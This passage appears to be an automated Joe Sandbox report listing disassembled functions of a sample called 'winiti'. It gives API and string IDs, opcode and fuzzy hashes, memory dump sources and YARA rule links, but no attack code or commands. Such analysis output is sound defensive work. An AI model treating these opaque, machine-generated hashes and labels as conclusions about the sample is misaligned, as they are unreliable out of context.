                  • API String ID: 456121617-0
                  • Opcode ID: 7460946a867b334da87abb833cff141128d26cc53670839ff519a9e4497aa03f
                  • Instruction ID: d34c9d4e8f51a06b6cf65686fda79833448af676da87540efa36953ac9112876
                  • Opcode Fuzzy Hash: 7460946a867b334da87abb833cff141128d26cc53670839ff519a9e4497aa03f
                  • Instruction Fuzzy Hash: 1D418072F10A5442FB92CF56D4457E96395E3A8BE4F04422AEA6D537D9DB38CA42C340
                  Function 000000013FDD5920 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastQueryRaiseVirtual
                  • String ID:
                  • API String ID: 3307674043-0
                  • Opcode ID: 1eb33025fcb74d676cc7358ae85899384f83db43159bf41c0ac61a9e8579e1b9
                  • Instruction ID: 2574a80db47a3bb6cea0b9e8a5d4fca593ed4c58ffe21812d337818c8100acf6
                  • Opcode Fuzzy Hash: 1eb33025fcb74d676cc7358ae85899384f83db43159bf41c0ac61a9e8579e1b9
                  • Instruction Fuzzy Hash: B1115A72A0478082DB64AF69B4093CAB360F7457B0F14433AA6BA477D6DB78C6038700
                  Function 000000013FDE29C0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: FreeVirtual
                  • String ID:
                  • API String ID: 1263568516-0
                  • Opcode ID: 5bf7aecc9f77985d4fc3611f7f1d3a7e0808b60eb16f243669942d2759ca37ea
                  • Instruction ID: 5da5ae05af271de68fbe4e77799eb6e72e40913ee7187e70abe62759df83893b
                  • Opcode Fuzzy Hash: 5bf7aecc9f77985d4fc3611f7f1d3a7e0808b60eb16f243669942d2759ca37ea
                  • Instruction Fuzzy Hash: A6B01210F12000C2E3042B337CC2B0C03182B09B22FC40018CB04A1350CD2D82E62B10

                  Non-executed Functions

                  Function 000000013FDE2A80 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                  • String ID: SeLockMemoryPrivilege
                  • API String ID: 1752251271-475654710
                  • Opcode ID: ddb9acfd945d833e265492e35a954827198e86c4bc086900fbe4fb1499a4b753
                  • Instruction ID: 48dcd2659c5a030ed369030c22b8a58b4b8ff6ddbd2202bda211e7893c704688
                  • Opcode Fuzzy Hash: ddb9acfd945d833e265492e35a954827198e86c4bc086900fbe4fb1499a4b753
                  • Instruction Fuzzy Hash: 92317072A04B4086FB209FA1B44839A77A5F798BD9F104039EF4E47759DE3DC6468B40
                  Function 000000013FDD80B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 248COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastRaise
                  • String ID: [ KeepUnwinding ]
                  • API String ID: 2546344036-400895726
                  • Opcode ID: ccef75ce2b4fd517aeb3d753c38118d6ca4b9bf99982452ca9f0cb54815e2628
                  • Instruction ID: 68d0461a2121cc91af8121da45231b82d0128e69ede8e4b767a964138fae84ab
                  • Opcode Fuzzy Hash: ccef75ce2b4fd517aeb3d753c38118d6ca4b9bf99982452ca9f0cb54815e2628
                  • Instruction Fuzzy Hash: E2C16A73A05B4481EB96CFA5E5887D933A5FB44B88F58413ADE490B3E8DF31C69AC350
                  Function 000000013FDD5410 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • The required instruction sets are not supported by the current CPU., xrefs: 000000013FDD570E
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastRaise
                  • String ID: The required instruction sets are not supported by the current CPU.
                  • API String ID: 2546344036-3318624164
                  • Opcode ID: ab07537777515488e9e8f57eef12ca18558389b5460dfc982353195e4352bf6a
                  • Instruction ID: 55a5a25e5934dbb38b1e4c261374974f18fa3916ee5f5989386cf45952457170
                  • Opcode Fuzzy Hash: ab07537777515488e9e8f57eef12ca18558389b5460dfc982353195e4352bf6a
                  • Instruction Fuzzy Hash: EC718371B242384AF7B64B5EA449BDA37A5BF253D0FC4092CF5054BBE1E7399A12CB04
                  Function 000000013FDDDF20 Relevance: 1.6, APIs: 1, Instructions: 55timeCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Time$FileSystem
                  • String ID:
                  • API String ID: 2086374402-0
                  • Opcode ID: b9729c8e631d8c46bd2c95e75bfe3429bf4dc4f5b6f10b25eebe2bb01cbc448c
                  • Instruction ID: 8a8e413456a3f9a17573355424ba3ed011fef9de2703c8a18b10b00334f01ba7
                  • Opcode Fuzzy Hash: b9729c8e631d8c46bd2c95e75bfe3429bf4dc4f5b6f10b25eebe2bb01cbc448c
                  • Instruction Fuzzy Hash: 84215C31A05B428AE7A6DF66F84438B77A4FB8C384F50416AFA4847B71EB3CC5848740
                  Function 000000013FDDAB80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                  • String ID: InitializeContext2$kernel32.dll
                  • API String ID: 4102459504-3117029998
                  • Opcode ID: 32bbcba0a65d150fc54e544dc3aa3406b0ed7865d1078f9dde3bace6e9329ecd
                  • Instruction ID: 0dc9fc8a6e6e04de2b6dbe3744d252b33562645b109cdd6e113c882fdf02e838
                  • Opcode Fuzzy Hash: 32bbcba0a65d150fc54e544dc3aa3406b0ed7865d1078f9dde3bace6e9329ecd
                  • Instruction Fuzzy Hash: 55317036A05B8482FB118BA9F94439EA394BB84BE4F444439EE4903BA4EF7CD647C710
                  Function 000000013FDD5EA0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83threadlibraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                  • String ID: QueueUserAPC2$kernel32
                  • API String ID: 3714266957-4022151419
                  • Opcode ID: 2c927c7249ad306362750963f21d316bcf2fc60d905bd8730f4bf37492db24bc
                  • Instruction ID: de7611d024f97a4f2c6e53c704105f20f52554896771f39cd1e62498ee195ace
                  • Opcode Fuzzy Hash: 2c927c7249ad306362750963f21d316bcf2fc60d905bd8730f4bf37492db24bc
                  • Instruction Fuzzy Hash: 34318671B00A4081EA519B6AE9583EA2391BF89BE4F404338FD69477E5DF39C74BC740
                  Function 000000013FDEDBE0 Relevance: 10.7, APIs: 7, Instructions: 227threadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: c13f5500ea1206e8ec5f05ebe3918e2a796096b40ac2d42ce93c8136b207df3a
                  • Instruction ID: 8eae09a4ef5ca8fc7a7f2c46b6a04b9a8ad1072dfede27fcbb2320bf492d1883
                  • Opcode Fuzzy Hash: c13f5500ea1206e8ec5f05ebe3918e2a796096b40ac2d42ce93c8136b207df3a
                  • Instruction Fuzzy Hash: 33A1C430E0060186F3569FA6AC49BEA3791AB787E4F14013DFA59876E9DF36C6028301
                  Function 000000013FDD62A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51threadCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                  • String ID:
                  • API String ID: 510365852-3916222277
                  • Opcode ID: aac18b405e8186b4baee27d6e985e552b0b39ad9a33c4f5303744330f0df3245
                  • Instruction ID: 3d48e8750d219c3bd9eb17a732563a5104d8656d3e773835c03b4d8d10c5ebcd
                  • Opcode Fuzzy Hash: aac18b405e8186b4baee27d6e985e552b0b39ad9a33c4f5303744330f0df3245
                  • Instruction Fuzzy Hash: AF118E73A04B808AD764EF69B4453CA7361F7457B4F180339A6B94BBEACB74C6428740
                  Function 000000013FDFD600 Relevance: 9.2, APIs: 6, Instructions: 189threadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: 01a89e310edcfaae1fb5271710d384d3bec56e2db4509541efe95d0668bf02e1
                  • Instruction ID: 4816c40bd28e867b8699d09a12b64d2c8bbb6d1c8254869c5a01efa55c7a1146
                  • Opcode Fuzzy Hash: 01a89e310edcfaae1fb5271710d384d3bec56e2db4509541efe95d0668bf02e1
                  • Instruction Fuzzy Hash: F381A431F0074086F7569BA69848FDA3390AB887A4F14013DFA56873E9DB39C947DB41
                  Function 000000013FDFA150 Relevance: 9.2, APIs: 6, Instructions: 180COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 775818c12bc7e14b7563a559daced99b5b62968cc71ab8af9d358da41de0e075
                  • Instruction ID: bbe09782a10aeb499aa6072557f8c9256206695ee2e1bcef0c52e6ab3b719bf9
                  • Opcode Fuzzy Hash: 775818c12bc7e14b7563a559daced99b5b62968cc71ab8af9d358da41de0e075
                  • Instruction Fuzzy Hash: 9B71BF32B0574082FB12ABA2A548BDA63E1B759FD4F09553DAA49076E9DF38C6168300
                  Function 000000013FDFFAE0 Relevance: 7.8, APIs: 6, Instructions: 317COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 418b0774b7d3228d4d9ac1118a31d47de2794695f603a46847a331a745cbe1d0
                  • Instruction ID: cdc72442590ebbcdb1d0d90911f944975f19f6fec8dde90cb8204a326188fcd6
                  • Opcode Fuzzy Hash: 418b0774b7d3228d4d9ac1118a31d47de2794695f603a46847a331a745cbe1d0
                  • Instruction Fuzzy Hash: 9DE1A272B05A5585DA16CFA5E954BE873A1EB087F4F8043369A3D5BBE8DB38C11AC300
                  Function 000000013FDD3680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastRaise
                  • String ID: Process is terminating due to StackOverflowException.
                  • API String ID: 2546344036-2200901744
                  • Opcode ID: fe34fe60a8b53b133f424caca37e213f3d652fd43d92ea617847fbec9e1bc9e9
                  • Instruction ID: 8877e160135d8d8083b5420f5f8e1c547bd682b4d0fb67307719a68b317e240b
                  • Opcode Fuzzy Hash: fe34fe60a8b53b133f424caca37e213f3d652fd43d92ea617847fbec9e1bc9e9
                  • Instruction Fuzzy Hash: 1751A076B11F4091FF659B9AE4593E92390EB48B84F49903AFA1E43BE1DF35C6968300
                  Function 000000013FE12FB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNEL32(?,?,?,?,0000000140400000,000000013FE130AD,?,?,00000000,000000013FDFFA9C,?,FFFFFFFF,47AE147AE147AE15,000000013FDE964C), ref: 000000013FE13002
                  • GetProcAddress.KERNEL32(?,?,?,?,0000000140400000,000000013FE130AD,?,?,00000000,000000013FDFFA9C,?,FFFFFFFF,47AE147AE147AE15,000000013FDE964C), ref: 000000013FE1301C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetEnabledXStateFeatures$kernel32.dll
                  • API String ID: 2574300362-4754247
                  • Opcode ID: 0d1bad6a7b8d3c1afb901e75ce55123fadd1554c836fe95c377a29b41be358a4
                  • Instruction ID: 0faefaa07dba3c346b4487cd5890f1f070fee1981778fef1be5c661be8072521
                  • Opcode Fuzzy Hash: 0d1bad6a7b8d3c1afb901e75ce55123fadd1554c836fe95c377a29b41be358a4
                  • Instruction Fuzzy Hash: 132100B2F252504AFFB8833AE1553FD53D39308794F96903EC90F82AE5DC1DCA829A00
                  Function 000000013FDDB1D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetEnabledXStateFeatures$kernel32
                  • API String ID: 2574300362-4273408117
                  • Opcode ID: 532f177c9a3abf93edbeefab53f090ab908d42bf1be2dcd3b1f8b265f2863a08
                  • Instruction ID: 3055ae1072405a57081882e9918db80bc75490a1020196fed807c80405ccfc16
                  • Opcode Fuzzy Hash: 532f177c9a3abf93edbeefab53f090ab908d42bf1be2dcd3b1f8b265f2863a08
                  • Instruction Fuzzy Hash: 0BE04626F5270081EF49AB61A8893D813907BA9B40FC8402CCD0D423A0EE3C834B8710
                  Function 000000013FDDB180 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetEnabledXStateFeatures$kernel32
                  • API String ID: 2574300362-4273408117
                  • Opcode ID: d9ff822428f1893a5703cac88901d505093234beacf457cec68585e3c479c2ba
                  • Instruction ID: cc14d5c8568a46a99550d0b5a1ed357f109a68cbec3c948986eda23ef45a9ed1
                  • Opcode Fuzzy Hash: d9ff822428f1893a5703cac88901d505093234beacf457cec68585e3c479c2ba
                  • Instruction Fuzzy Hash: CDE0EC26F12B4081FF59ABA1A8553D413957F89B88F88517CCD0D42390EF3C975F9B10
                  Function 000000013FE0E8F0 Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
